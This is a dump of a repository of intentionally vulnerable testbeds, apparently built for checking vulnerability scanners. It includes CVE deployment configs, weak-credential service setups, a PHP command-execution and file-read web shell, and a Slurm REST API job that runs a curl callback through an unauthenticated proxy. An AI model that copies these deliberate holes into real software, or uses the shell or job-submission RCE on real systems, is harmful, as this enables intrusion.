\n"; 10 | system($_GET['cmd']); 11 | 12 | } elseif (isset($_GET['file_to_read']) ) { 13 | echo "Reading ". $_GET['file_to_read']; 14 | echo file_get_contents($_GET['file_to_read']); 15 | 16 | } else { 17 | echo "Error: This script requires 'cmd' or 'file_to_read' parameter."; 18 | } 19 | 20 | ?> 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/startup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cron 3 | exec "$@" 4 | -------------------------------------------------------------------------------- /postgres/weak_credentials/postgres.md: -------------------------------------------------------------------------------- 1 | # Postgres 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres:tag` 5 | 6 | 2. Verify Postgres is working as intended: `psql -h ip-addr -U postgres` -------------------------------------------------------------------------------- /rabbitmq/weak_credentials/Dockerfile: -------------------------------------------------------------------------------- 1 | # 2 | # NOTE: THIS DOCKERFILE IS GENERATED VIA "apply-templates.sh" 3 | # 4 | # PLEASE DO NOT EDIT IT DIRECTLY. 
5 | # 6 | # This Dockerfile is taken from this repository https://github.com/docker-library/rabbitmq/blob/80011d74327aea3ddd460b189c6533c1f177f48f/3.13-rc/ubuntu/management/Dockerfile 7 | 8 | FROM rabbitmq:3.13-rc 9 | 10 | RUN set eux; \ 11 | rabbitmq-plugins enable --offline rabbitmq_management; \ 12 | # make sure the metrics collector is re-enabled (disabled in the base image for Prometheus-style metrics by default) 13 | rm -f /etc/rabbitmq/conf.d/20-management_agent.disable_metrics_collector.conf; \ 14 | # grab "rabbitmqadmin" from inside the "rabbitmq_management-X.Y.Z" plugin folder 15 | # see https://github.com/docker-library/rabbitmq/issues/207 16 | cp /plugins/rabbitmq_management-*/priv/www/cli/rabbitmqadmin /usr/local/bin/rabbitmqadmin; \ 17 | [ -s /usr/local/bin/rabbitmqadmin ]; \ 18 | chmod +x /usr/local/bin/rabbitmqadmin; \ 19 | apt-get update; \ 20 | apt-get install -y --no-install-recommends python3; \ 21 | rm -rf /var/lib/apt/lists/*; \ 22 | rabbitmqadmin --version 23 | 24 | ENV RABBITMQ_DEFAULT_PASS=root 25 | 26 | EXPOSE 15671 15672 27 | -------------------------------------------------------------------------------- /rabbitmq/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # RabbitMQ Management Portal 2 | 3 | ## Setup 4 | 5 | 1. `docker build -t rabbitmq .` 6 | 2. `docker run -d -p 8081:15671 8082:15672 rabbitmq` 7 | 8 | It's important to notice that currently nmap doesn't scan as default the port 15672 where normally is running the management plugin, so in for the sake of testing we are going to map it to a different port 9 | -------------------------------------------------------------------------------- /ray/CVE-2023-48022/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-48022 ray RCE 2 | This directory contains the deployment configs for ray in a configuration 3 | vulnerable to CVE-2023-48022. 
4 | The deployed service has name `cve-2023-48022` and listens on port `80`. -------------------------------------------------------------------------------- /ray/CVE-2023-48022/ray.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: cve-2023-48022 5 | labels: 6 | app: cve-2023-48022 7 | spec: 8 | ports: 9 | - port: 80 10 | name: http 11 | targetPort: 8265 12 | selector: 13 | app: cve-2023-48022 14 | type: LoadBalancer 15 | --- 16 | apiVersion: apps/v1 17 | kind: Deployment 18 | metadata: 19 | name: cve-2023-48022 20 | labels: 21 | app: cve-2023-48022 22 | spec: 23 | selector: 24 | matchLabels: 25 | app: cve-2023-48022 26 | strategy: 27 | type: Recreate 28 | template: 29 | metadata: 30 | labels: 31 | app: cve-2023-48022 32 | spec: 33 | containers: 34 | - name: cve-2023-48022 35 | image: rayproject/ray:2.5.0@sha256:cb53dcc21af8f913978fd2a3fc57c812f87d99e0b40db6a42ccd6f43eca11281 36 | ports: 37 | - containerPort: 8265 38 | command: ["/bin/bash", "-c", "ray start --head --dashboard-host=0.0.0.0 && tail -f /dev/null"] 39 | -------------------------------------------------------------------------------- /redis/CVE-2022-0543/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-0543 2 | It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. 
## Testbed setup
command and you will receive a response similar to
Notice that we are mapping container port 8787 to host port 8000 to make it detectable by nmap during scanning. Also notice that we have set the default credentials in the Dockerfile
The Slurm Rest API requires authentication by default. However, a common configuration involves using a reverse proxy that (theoretically) should authenticate the user with some other method and, if successful, authenticates to the Slurm Rest API using a hardcoded JWT token that is injected into the forwarded request's headers.
9 | 10 | ## This testbed 11 | 12 | To simulate an insecure Rest API proxy, a Caddy server is deployed in reverse-proxy mode on `127.0.0.1:8080`. The reverse proxy authenticates with the Slurm Rest API via a pre-generated JWT token with no expiration, this way there's no need to generate a new token every time the testbed is launched. 13 | 14 | The secure Slurm Rest API is also exposed on `127.0.0.1:6820` for testing purposes. 15 | 16 | ## Testbed Setup 17 | 18 | To start the testbed, simply run `docker compose up` 19 | 20 | ## Test the vulnerability 21 | You can test the vulnerability by modifying the `script` field in the `rest_api_test.json` file to the desired command to execute. For example, you can get a canary URL from a service like [webhook.site](https://webhook.site) and run a curl command to receive a callback. Here's an example: 22 | ```json 23 | { 24 | "job": { 25 | "name": "test", 26 | "ntasks": 1, 27 | "current_working_directory": "/tmp", 28 | "environment": [ 29 | "PATH:/bin:/usr/bin/:/usr/local/bin/" 30 | ] 31 | }, 32 | "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1" 33 | } 34 | ``` 35 | Note: make sure to keep the shebang (`#!/bin/bash\n`) at the start of the string. 
36 | 37 | Then you can submit the job using curl: 38 | ```sh 39 | curl http://127.0.0.1:8080/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json 40 | ``` 41 | 42 | A response from a vulnerable API will look like this: 43 | ```json 44 | { 45 | "meta": { 46 | "plugin": { 47 | "type": "openapi\/v0.0.39", 48 | "name": "Slurm OpenAPI v0.0.39", 49 | "data_parser": "v0.0.39" 50 | }, 51 | "client": { 52 | "source": "[api-proxy.slurm-testbed_slurm-testbed-network]:10988" 53 | }, 54 | "Slurm": { 55 | "version": { 56 | "major": 24, 57 | "micro": 4, 58 | "minor": 5 59 | }, 60 | "release": "24.05.4" 61 | } 62 | }, 63 | "errors": [], 64 | "warnings": [], 65 | "result": { 66 | "job_id": 11, 67 | "step_id": "batch", 68 | "error_code": 0, 69 | "error": "No error", 70 | "job_submit_user_msg": "" 71 | }, 72 | "job_id": 11, 73 | "step_id": "batch", 74 | "job_submit_user_msg": "" 75 | } 76 | ``` 77 | 78 | To check a non-vulnerable API, you can send the request to the original Rest API on port 6820, which requires authentication by default, therefore not vulnerable: 79 | ```sh 80 | curl http://127.0.0.1:6820/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json 81 | 82 | Authentication failure 83 | ``` 84 | 85 | As you can see, the authentication fails and the request is rejected. 
-------------------------------------------------------------------------------- /slurm/exposed_rest_api/docker-compose.yml: -------------------------------------------------------------------------------- 1 | name: slurm-testbed 2 | services: 3 | slurm: 4 | build: ./slurm 5 | ports: 6 | - 6820:6820 7 | networks: 8 | - slurm-testbed-network 9 | 10 | api-proxy: 11 | image: caddy:2.9-alpine 12 | container_name: api-proxy 13 | command: 14 | - "caddy" 15 | - "reverse-proxy" 16 | - "--from" 17 | - ":8080" 18 | - "--to" 19 | - "http://slurm:6820" 20 | - "--header-up" 21 | - "X-SLURM-USER-NAME: slurm" 22 | - "--header-up" 23 | - "X-SLURM-USER-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjM4Nzk4MDQ5MjQsImlhdCI6MTczMjMyMTI3OCwic3VuIjoicm9vdCJ9.lV0sZg_KGxSck90yxVJ52vWzeL_ldtqse_Fn10vWz_0" 24 | - "--access-log" 25 | ports: 26 | - 8080:8080 27 | depends_on: 28 | - "slurm" 29 | networks: 30 | - slurm-testbed-network 31 | 32 | networks: 33 | slurm-testbed-network: 34 | driver: bridge 35 | -------------------------------------------------------------------------------- /slurm/exposed_rest_api/rest_api_test.json: -------------------------------------------------------------------------------- 1 | { 2 | "job": { 3 | "name": "test", 4 | "ntasks": 1, 5 | "current_working_directory": "/tmp", 6 | "environment": [ 7 | "PATH:/bin:/usr/bin/:/usr/local/bin/" 8 | ] 9 | }, 10 | "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1" 11 | } 12 | -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/Dockerfile: -------------------------------------------------------------------------------- 1 | # Slurm 24 is not available in bookworm 2 | FROM debian:trixie-slim 3 | 4 | ARG DEBIAN_FRONTEND=noninteractive 5 | 6 | RUN set -ex \ 7 | && apt-get update -y \ 8 | && apt-get install -y \ 9 | slurm-wlm \ 10 | slurmrestd \ 11 | slurm-wlm-basic-plugins \ 12 | slurm-wlm-jwt-plugin \ 13 | munge \ 14 | curl 15 | 
16 | RUN mkdir -p /etc/sysconfig/slurm \ 17 | /var/spool/slurm \ 18 | /var/run/slurm \ 19 | /var/lib/slurm \ 20 | /var/log/slurm \ 21 | /var/spool/slurm/statesave \ 22 | /run/munge \ 23 | /data 24 | RUN touch /var/lib/slurm/node_state \ 25 | /var/lib/slurm/front_end_state \ 26 | /var/lib/slurm/job_state \ 27 | /var/lib/slurm/resv_state \ 28 | /var/lib/slurm/trigger_state \ 29 | /var/lib/slurm/assoc_mgr_state \ 30 | /var/lib/slurm/assoc_usage \ 31 | /var/lib/slurm/qos_usage \ 32 | /var/lib/slurm/fed_mgr_state 33 | 34 | # Generate key for JWT authentication 35 | # RUN dd if=/dev/random of=/var/spool/slurm/statesave/jwt_hs256.key bs=32 count=1 36 | 37 | # Let's use a static JWT key for testing 38 | COPY jwt_hs256.key /var/spool/slurm/statesave/jwt_hs256.key 39 | 40 | # Set permissions 41 | RUN chown -R slurm:slurm /var/*/slurm* 42 | RUN chown -R munge:munge /run/munge 43 | RUN chmod 0600 /var/spool/slurm/statesave/jwt_hs256.key \ 44 | && chmod 0755 /var/spool/slurm/statesave 45 | 46 | COPY slurm.conf /etc/slurm/slurm.conf 47 | COPY cgroup.conf /etc/slurm/cgroup.conf 48 | 49 | COPY entrypoint.sh /entrypoint.sh 50 | ENTRYPOINT ["/entrypoint.sh"] -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/cgroup.conf: -------------------------------------------------------------------------------- 1 | CgroupPlugin=disabled 2 | IgnoreSystemd=yes -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | # Start munge 5 | service munge start 6 | sleep 1 7 | 8 | # Start slurmctld and wait for it to start 9 | /usr/sbin/slurmctld -i -Dvv & 10 | sleep 2 11 | until 2>/dev/null >/dev/tcp/127.0.0.1/6817 12 | do 13 | echo "Waiting for slurmctld to start" 14 | sleep 2 15 | done 16 | 17 | # Start slurmd (worker process) 18 | /usr/sbin/slurmd -Dvv & 19 | 
20 | # Start slurmrestd 21 | export SLURM_JWT="daemon" 22 | export SLURMRESTD_SECURITY="disable_unshare_files,disable_unshare_sysv,disable_user_check" 23 | /usr/sbin/slurmrestd 0.0.0.0:6820 -a rest_auth/jwt -vv -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/jwt_hs256.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/slurm/exposed_rest_api/slurm/jwt_hs256.key -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/slurm.conf: -------------------------------------------------------------------------------- 1 | # slurm.conf 2 | # 3 | # See the slurm.conf man page for more information. 4 | # 5 | ClusterName=linux 6 | ControlMachine=localhost 7 | ControlAddr=localhost 8 | SlurmctldPort=6817 9 | SlurmdPort=6818 10 | AuthType=auth/munge 11 | AuthAltTypes=auth/jwt 12 | AuthAltParameters=jwt_key=/var/spool/slurm/statesave/jwt_hs256.key 13 | StateSaveLocation=/var/lib/slurm 14 | SlurmdSpoolDir=/var/spool/slurm 15 | SwitchType=switch/none 16 | MpiDefault=none 17 | SlurmctldPidFile=/var/run/slurm/slurmctld.pid 18 | SlurmdPidFile=/var/run/slurm/slurmd.pid 19 | ProctrackType=proctrack/linuxproc 20 | ReturnToService=0 21 | # 22 | # TIMERS 23 | SlurmctldTimeout=300 24 | SlurmdTimeout=300 25 | InactiveLimit=0 26 | MinJobAge=300 27 | KillWait=30 28 | Waittime=0 29 | # 30 | # SCHEDULING 31 | SchedulerType=sched/backfill 32 | SelectType=select/cons_tres 33 | SelectTypeParameters=CR_CPU_Memory 34 | # 35 | # LOGGING 36 | SlurmctldDebug=3 37 | SlurmctldLogFile=/var/log/slurm/slurmctld.log 38 | SlurmdDebug=3 39 | SlurmdLogFile=/var/log/slurm/slurmd.log 40 | JobCompType=jobcomp/filetxt 41 | JobCompLoc=/var/log/slurm/jobcomp.log 42 | # 43 | # ACCOUNTING 44 | JobAcctGatherType=jobacct_gather/linux 45 | JobAcctGatherFrequency=30 46 | # 47 | # 
COMPUTE NODES 48 | NodeName=localhost RealMemory=1000 State=UNKNOWN 49 | # 50 | # PARTITIONS 51 | PartitionName=normal Default=yes Nodes=localhost Priority=50 DefMemPerCPU=500 Shared=NO MaxNodes=2 MaxTime=5-00:00:00 DefaultTime=5-00:00:00 State=UP 52 | -------------------------------------------------------------------------------- /smb/weak_credentials/smb.md: -------------------------------------------------------------------------------- 1 | # SMB 2 | # Setup 3 | 4 | 1. Create docker image with this command: 5 | ``` 6 | sudo docker run -it -p 139:139 -p 445:445 -d dperson/samba -p \ 7 | -u "example1;badpass" \ 8 | -u "example2;badpass" \ 9 | -s "public;/share;yes;no;no" \ 10 | -s "users;/srv;no;no;no;example1,example2" \ 11 | -s "example1 private share;/example1;no;no;no;example1" \ 12 | -s "example2 private share;/example2;no;no;no;example2" \ 13 | -g "restrict anonymous=2" \ 14 | -g "map to guest = Bad User" -S 15 | 16 | ``` 17 | 18 | 2. Run and verify that it is up and running: `smbclient -L ip-addr -U user` 19 | 20 | 3. Verify that it is working properly: `smbclient //ip-addr/IPC$ -U user` -------------------------------------------------------------------------------- /spring/spring_cloud/spring_cloud_function/CVE-2022-22963/README.md: -------------------------------------------------------------------------------- 1 | # Spring Cloud Function CVE-2022-22963 2 | 3 | This directory contains the deployment configs for a Spring Cloud Function 4 | application with vulnerability to CVE-2022-22963 using SpEL injection. 5 | 6 | This configs deploys service `scf-cve-2022-22963` and listens on port `8080`. 
7 | 8 | ## Template data 9 | 10 | ```json 11 | { 12 | "scf_version": "3.2.2" 13 | } 14 | ``` 15 | -------------------------------------------------------------------------------- /spring/spring_cloud/spring_cloud_function/CVE-2022-22963/spring-cloud-function.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing an Spring Cloud Function instance. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: scf-cve-2022-22963 6 | labels: 7 | app: scf-cve-2022-22963 8 | version: ${scf_version} 9 | spec: 10 | ports: 11 | - port: 8080 12 | name: http 13 | targetPort: 8080 14 | selector: 15 | app: scf-cve-2022-22963 16 | version: ${scf_version} 17 | type: LoadBalancer 18 | --- 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | name: scf-cve-2022-22963 23 | labels: 24 | app: scf-cve-2022-22963 25 | version: ${scf_version} 26 | spec: 27 | selector: 28 | matchLabels: 29 | app: scf-cve-2022-22963 30 | version: ${scf_version} 31 | tier: frontend 32 | strategy: 33 | type: Recreate 34 | template: 35 | metadata: 36 | labels: 37 | app: scf-cve-2022-22963 38 | tier: frontend 39 | version: ${scf_version} 40 | spec: 41 | containers: 42 | - name: scf-cve-2022-22963 43 | image: threedr3am/spring-cloud-function-sample:${scf_version} 44 | ports: 45 | - containerPort: 8080 46 | -------------------------------------------------------------------------------- /ssh/weak_credentials/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | RUN apt update && apt install openssh-server sudo -y 3 | RUN useradd -rm -d /home/ubuntu -s /bin/bash -g root -G sudo -u 1000 test 4 | RUN echo 'test:test' | chpasswd 5 | RUN service ssh start 6 | EXPOSE 22 7 | CMD [ "/usr/sbin/sshd", "-D" ] -------------------------------------------------------------------------------- /ssh/weak_credentials/ssh.md: 
-------------------------------------------------------------------------------- 1 | # SSH 2 | # Setup 3 | 4 | 1. Create a docker image from the Dockerfile in this directory by running: `docker build -t myssh:latest .` 5 | 2. Start the ssh server by running: `docker run -p 8222:22 myssh:latest` 6 | 3. Verify ssh is working by doing: `ssh user@ip` 7 | -------------------------------------------------------------------------------- /strapi/CVE-2023-22893/README.md: -------------------------------------------------------------------------------- 1 | # Strapi CVE-2023-22893 2 | 3 | CVE-2023-22893 is an authentication bypass in strapi when using the AWS cognito 4 | provider. 5 | 6 | ```sh 7 | $ docker build -t strapi:vuln -f vulnerable.Dockerfile . 8 | $ docker create --name strapi -p 127.0.0.1:1337:1337 strapi:vuln 9 | $ docker start strapi 10 | 11 | $ docker build -t strapi:novuln -f non-vulnerable.Dockerfile . 12 | $ docker create --name strapi -p 127.0.0.1:1337:1337 strapi:novuln 13 | $ docker start strapi 14 | ``` 15 | 16 | Both images requires post-installation setup: 17 | 18 | - You will need to create an admin account (app running on TCP port 1337) 19 | - The AWS cognito provider must be enabled: 20 | * Administration panel > Settings > User & Permissions plugin > Providers 21 | * Edit button 22 | * Set enable to TRUE 23 | * Set random values for Client ID, Client Secret and Host URI 24 | * If setting up the non-vulnerable instance, don't forget to set a JWKS URL 25 | that is different from `http://127.0.0.1:1337/tsunami/` 26 | 27 | From this point on, the instance should be ready. 
28 | -------------------------------------------------------------------------------- /strapi/CVE-2023-22893/non-vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | from node:16.13.0-slim 2 | 3 | RUN npx create-strapi-app@4.6.0 --quickstart --no-run myproject 4 | WORKDIR myproject 5 | RUN yarn 6 | RUN npm rebuild 7 | 8 | ENTRYPOINT yarn develop 9 | -------------------------------------------------------------------------------- /strapi/CVE-2023-22893/vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | from node:16.13.0-slim 2 | 3 | RUN npx create-strapi-app@4.5.0 --quickstart --no-run myproject 4 | WORKDIR myproject 5 | RUN yarn 6 | RUN npm rebuild 7 | 8 | ENTRYPOINT yarn develop 9 | -------------------------------------------------------------------------------- /telnet/weak_credentials/telnet.md: -------------------------------------------------------------------------------- 1 | # Telnet 2 | # Setup 3 | 1: Create docker images with this command: `docker run -itd --name=telnetServer flemingcsi/telnet-server` 4 | 5 | 2: Verify docker is up with this command and check ports: `docker ps` 6 | 7 | 3: Verify to see if working properly with this command: `telnet (image ipaddress)` 8 | 9 | 4: Log in with the credentials root:malware 10 | -------------------------------------------------------------------------------- /triton/triton-inference-server/ASimpleModel/1/model.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | class TritonPythonModel: 4 | 5 | def initialize(self, args): 6 | print("init") 7 | 8 | def execute(self, requests): 9 | return 10 | 11 | def finalize(self): 12 | return 13 | -------------------------------------------------------------------------------- /triton/triton-inference-server/ASimpleModel/config.pbtxt: -------------------------------------------------------------------------------- 
Publicly exposed Triton inference servers before version 2.40 that are started with the `--model-control explicit` option are vulnerable to remote code execution via dynamic model loading through the model control APIs.
10 | ```bash 11 | docker run --rm -p8000:8000 -p8001:8001 -p8002:8002 -v APathWithNoModelInside/:/models nvcr.io/nvidia/tritonserver:23.10-py3 tritonserver --model-repository=/models --model-control explicit 12 | ``` 13 | 14 | # vulnerable version instance setup 15 | ```bash 16 | docker run --rm -p8000:8000 -p8001:8001 -p8002:8002 -v ASimpleModel/:/models nvcr.io/nvidia/tritonserver:23.10-py3 tritonserver --model-repository=/models --model-control explicit 17 | ``` 18 | -------------------------------------------------------------------------------- /vbulletin/CVE-2019-16759/README.md: -------------------------------------------------------------------------------- 1 | # vBulletin pre-auth RCE vulnerability (CVE-2019-16759) 2 | 3 | This directory contains the deployment configs for a vBulletin application with 4 | pre-auth RCE vulnerability (CVE-2019-16759). 5 | 6 | The deployed service has name `vbulletin-cve-2019-16759` and listens on port 7 | `80`. 8 | 9 | -------------------------------------------------------------------------------- /vbulletin/CVE-2019-16759/vbulletin_cve_2019_16759.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vBulletin service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: vbulletin-cve-2019-16759 6 | labels: 7 | app: vbulletin-cve-2019-16759 8 | spec: 9 | ports: 10 | - port: 80 11 | selector: 12 | app: vbulletin-cve-2019-16759 13 | type: LoadBalancer 14 | --- 15 | # The vulnerable vBulletin service. 
16 | apiVersion: apps/v1 17 | kind: Deployment 18 | metadata: 19 | name: vbulletin-cve-2019-16759 20 | labels: 21 | app: vbulletin-cve-2019-16759 22 | spec: 23 | selector: 24 | matchLabels: 25 | app: vbulletin-cve-2019-16759 26 | tier: frontend 27 | strategy: 28 | type: Recreate 29 | template: 30 | metadata: 31 | labels: 32 | app: vbulletin-cve-2019-16759 33 | tier: frontend 34 | spec: 35 | containers: 36 | - name: vbulletin-cve-2019-16759 37 | image: co0ontty/vbulletin_5.x_rce:latest 38 | ports: 39 | - containerPort: 80 40 | -------------------------------------------------------------------------------- /vnc/weak_credentials/vnc.md: -------------------------------------------------------------------------------- 1 | # VNC 2 | # Setup 3 | 1: Create docker images with this command: `docker run -d -p 5901:5901 -p 6901:6901 consol/rocky-xfce-vnc` 4 | 5 | 2: Verify docker is up with this command and check ports: `docker ps` 6 | 7 | 3: Verify to see if working properly by using a VNC client and logging in with the image ip address and the password: `vncpassword` 8 | -------------------------------------------------------------------------------- /wordpress/unfinished_installation/README.md: -------------------------------------------------------------------------------- 1 | # WordPress with exposed installation page 2 | 3 | This directory contains the deployment configs for a WordPress application where 4 | the installation page is exposed. The service listens on port `80`. 5 | 6 | This config deploys the following services: 7 | 8 | - `pre-setup-wp`: the WordPress application. 9 | - `pre-setup-wp-mysql`: the MySql database for the WordPress application. 10 | 11 | and the following storage: 12 | 13 | - `mysql-pv-claim`: File system required by MySql. 14 | - `pre-setup-wp-pv-claim`: File system required by WordPress. 
15 | 16 | Replace `${db_password}` with a password of your choice in wordpress.yaml -------------------------------------------------------------------------------- /wordpress/unfinished_installation/mysql.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the MySQL service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: pre-setup-wp-mysql 6 | labels: 7 | app: pre-setup-wp 8 | spec: 9 | ports: 10 | - port: 3306 11 | selector: 12 | app: pre-setup-wp 13 | tier: pre-setup-wp-mysql 14 | clusterIP: None 15 | --- 16 | # The PVC required by the MySQL app. 17 | apiVersion: v1 18 | kind: PersistentVolumeClaim 19 | metadata: 20 | name: mysql-pv-claim 21 | labels: 22 | app: pre-setup-wp 23 | spec: 24 | accessModes: 25 | - ReadWriteOnce 26 | resources: 27 | requests: 28 | storage: 20Gi 29 | --- 30 | # The MySQL app. 31 | apiVersion: apps/v1 32 | kind: Deployment 33 | metadata: 34 | name: pre-setup-wp-mysql 35 | labels: 36 | app: pre-setup-wp 37 | spec: 38 | selector: 39 | matchLabels: 40 | app: pre-setup-wp 41 | tier: pre-setup-wp-mysql 42 | strategy: 43 | type: Recreate 44 | template: 45 | metadata: 46 | labels: 47 | app: pre-setup-wp 48 | tier: pre-setup-wp-mysql 49 | spec: 50 | containers: 51 | - image: mysql:5.6 52 | name: pre-setup-wp-mysql 53 | env: 54 | - name: MYSQL_ROOT_PASSWORD 55 | value: ${db_password} 56 | ports: 57 | - containerPort: 3306 58 | volumeMounts: 59 | - name: pre-setup-wp-mysql-persistent-storage 60 | mountPath: /var/lib/mysql 61 | volumes: 62 | - name: pre-setup-wp-mysql-persistent-storage 63 | persistentVolumeClaim: 64 | claimName: mysql-pv-claim 65 | -------------------------------------------------------------------------------- /wordpress/unfinished_installation/wordpress.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the WordPress app. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: pre-setup-wp 6 | labels: 7 | app: pre-setup-wp 8 | spec: 9 | ports: 10 | - port: 80 11 | selector: 12 | app: pre-setup-wp 13 | tier: frontend 14 | type: LoadBalancer 15 | --- 16 | # The PVC required by the WordPress app. 17 | apiVersion: v1 18 | kind: PersistentVolumeClaim 19 | metadata: 20 | name: pre-setup-wp-pv-claim 21 | labels: 22 | app: pre-setup-wp 23 | spec: 24 | accessModes: 25 | - ReadWriteOnce 26 | resources: 27 | requests: 28 | storage: 20Gi 29 | --- 30 | # WordPress application. 31 | apiVersion: apps/v1 32 | kind: Deployment 33 | metadata: 34 | name: pre-setup-wp 35 | labels: 36 | app: pre-setup-wp 37 | spec: 38 | selector: 39 | matchLabels: 40 | app: pre-setup-wp 41 | tier: frontend 42 | strategy: 43 | type: Recreate 44 | template: 45 | metadata: 46 | labels: 47 | app: pre-setup-wp 48 | tier: frontend 49 | spec: 50 | # By default the wordpress image is in the pre-setup state. 51 | containers: 52 | - image: wordpress 53 | name: pre-setup-wp 54 | env: 55 | - name: WORDPRESS_DB_HOST 56 | value: pre-setup-wp-mysql 57 | - name: WORDPRESS_DB_PASSWORD 58 | value: ${db_password} 59 | ports: 60 | - containerPort: 80 61 | volumeMounts: 62 | - name: pre-setup-wp-persistent-storage 63 | mountPath: /var/www/html 64 | volumes: 65 | - name: pre-setup-wp-persistent-storage 66 | persistentVolumeClaim: 67 | claimName: pre-setup-wp-pv-claim 68 | -------------------------------------------------------------------------------- /wordpress/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.1' 2 | 3 | services: 4 | 5 | wordpress: 6 | image: wordpress 7 | restart: always 8 | ports: 9 | - 8080:80 10 | environment: 11 | WORDPRESS_DB_HOST: db 12 | WORDPRESS_DB_USER: exampleuser 13 | WORDPRESS_DB_PASSWORD: examplepass 14 | WORDPRESS_DB_NAME: exampledb 15 | volumes: 16 | - wordpress:/var/www/html 17 | 18 | db: 19 | image: mysql:5.7 20 | 
restart: always 21 | environment: 22 | MYSQL_DATABASE: exampledb 23 | MYSQL_USER: exampleuser 24 | MYSQL_PASSWORD: examplepass 25 | MYSQL_RANDOM_ROOT_PASSWORD: '1' 26 | volumes: 27 | - db:/var/lib/mysql 28 | 29 | volumes: 30 | wordpress: 31 | db: -------------------------------------------------------------------------------- /wordpress/weak_credentials/wordpress.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to view the selected username and password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Connect to it locally by going to `localhost:8080` and configure it using the setup client 9 | 10 | 4. Verify to see if working properly: Log in by visiting `localhost:8080` and using root credentials -------------------------------------------------------------------------------- /xrdp/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # xrdp Weak Credential Setup 2 | 3 | ## Option 1 - GCE VM 4 | 5 | 1. Create a new debian based GCE VM 6 | 2. Install graphical interface and enable xrdp. You can follow the reference at https://linuxize.com/post/how-to-install-xrdp-on-debian-10/. 7 | 8 | ```sh 9 | sudo apt update 10 | sudo apt install xfce4 xfce4-goodies xorg dbus-x11 x11-xserver-utils 11 | sudo apt install xrdp 12 | sudo systemctl status xrdp 13 | sudo adduser xrdp ssl-cert 14 | sudo systemctl restart xrdp 15 | ``` 16 | 17 | 3. Enable password-base auth on the vm 18 | 19 | ```sh 20 | sudo vim /etc/ssh/sshd_config 21 | # Change `PasswordAuthentication yes` 22 | sudo service ssh restart 23 | ``` 24 | 25 | 4. Configure a weak password to your user 26 | ``` sh 27 | sudo passwd 28 | ``` 29 | 30 | ## Option 2 - Running xrdp in Docker 31 | 32 | Use the docker image from https://github.com/satishweb/docker-xrdp. 
33 | 34 | ```sh 35 | docker run -d -e GUEST_PASS='guest' -p 3389:3389 --name xrdp satishweb/xrdp 36 | ``` 37 | -------------------------------------------------------------------------------- /xwiki/CVE-2024-21650/README.md: -------------------------------------------------------------------------------- 1 | # XWiki CVE-2024-21650 2 | 3 | This directory contains environment files and can be used with the [deployment config](https://github.com/xwiki/xwiki-docker/blob/master/15/mariadb-tomcat/docker-compose.yml) for XWiki vulnerable (15.7.0) and fixed (15.10.4) cases to test CVE-2024-21650 vulnerability. 4 | 5 | ## Vulnerable Setup 6 | 7 | ``` 8 | docker-compose --env-file env-true-positive -p xwiki-true-positive-15-7 up -d 9 | ``` 10 | 11 | ## Non-vulnerable Setup 12 | 13 | ``` 14 | docker-compose --env-file env-true-negative -p xwiki-true-negative-15-10 up -d 15 | ``` 16 | 17 | Application will be available at `localhost:8080` 18 | 19 | ## Web installation 20 | Follow the installation wizard at localhost:8080. There are a few important steps: 21 | - Register an admin user. 22 | - Install the XWiki Standard Flavor (standard configuration). 23 | 24 | The XWiki homepage will be displayed after the wizard completes. 
